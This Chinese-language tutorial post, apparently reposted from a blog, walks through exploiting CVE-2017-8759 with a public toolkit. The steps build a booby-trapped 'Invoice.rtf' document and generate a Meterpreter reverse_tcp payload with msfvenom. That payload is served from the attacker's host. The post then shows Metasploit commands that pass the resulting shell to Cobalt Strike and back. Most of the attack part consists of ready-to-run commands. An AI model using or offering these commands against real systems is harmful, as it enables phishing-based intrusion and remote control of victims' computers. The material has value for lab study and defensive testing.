metasploit 派生 shell

时间  2019-11-19
标签 metasploit 派生 shell 栏目 Unix 繁體版
原文   原文链接

    

1. 前言html

    metasploit 获取的 shell 派生给其余工具,例如 Cobaltstrikepython

    以 CVE-2017-8759 为例经过 msf 获取 shell 后派生给 Cobaltstrike git

 

2. 环境github

    Kali : 192.168.229.143shell

    win7 : 192.168.229.137vim

Cobaltstrike+jdk:连接:http://pan.baidu.com/s/1eSJ7P54   密码:krqn
CVE-2017-8759-exp:    https://github.com/bhdresh/CVE-2017-8759.git

  kali jdk 环境变量
  windows

vim /etc/profile
export JAVA_HOME=/usr/share/jdk1.8.0_91
export CLASSPATH=.:${JAVA_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATHsession

 

3. exploit CVE-2017-8759tcp

# git clone https://github.com/bhdresh/CVE-2017-8759.git
1) 生成 RTF 文件

   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.229.143/logo.txt
   
2) 生成 MSF payload 并启动 handler

   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.143 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.229.143; run"
   
3) 开发模式下传送本地 payload

   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.229.143/shell.exe -l /tmp/shell.exe

 

4. 派生 shell 给 Cobalt strike工具

    打开 Cobalt strike 建立一个新的监听器

   

    注入一个新的 payload 到当前 session 中

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.229.143
msf exploit(payload_inject) > set LPORT 1212
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

    

 

5. Cobalt strike 派生 shell 给 MSF

    msf 开启 reverse_tcp 监听模式

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.229.143
msf exploit(handler) > set lport 5555
msf exploit(handler) > exploit -j

    使用Cobalt Strike建立一个windows/foreign/reverse_tcp Listener

    

    右键 -> Spawn

    

    选择建立的监听器

    

    

 

 

https://secvul.com/topics/862.html

http://blog.csdn.net/qq_27446553/article/details/52282457  

http://www.360doc.com/content/16/0524/09/33492643_561811422.shtml  

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程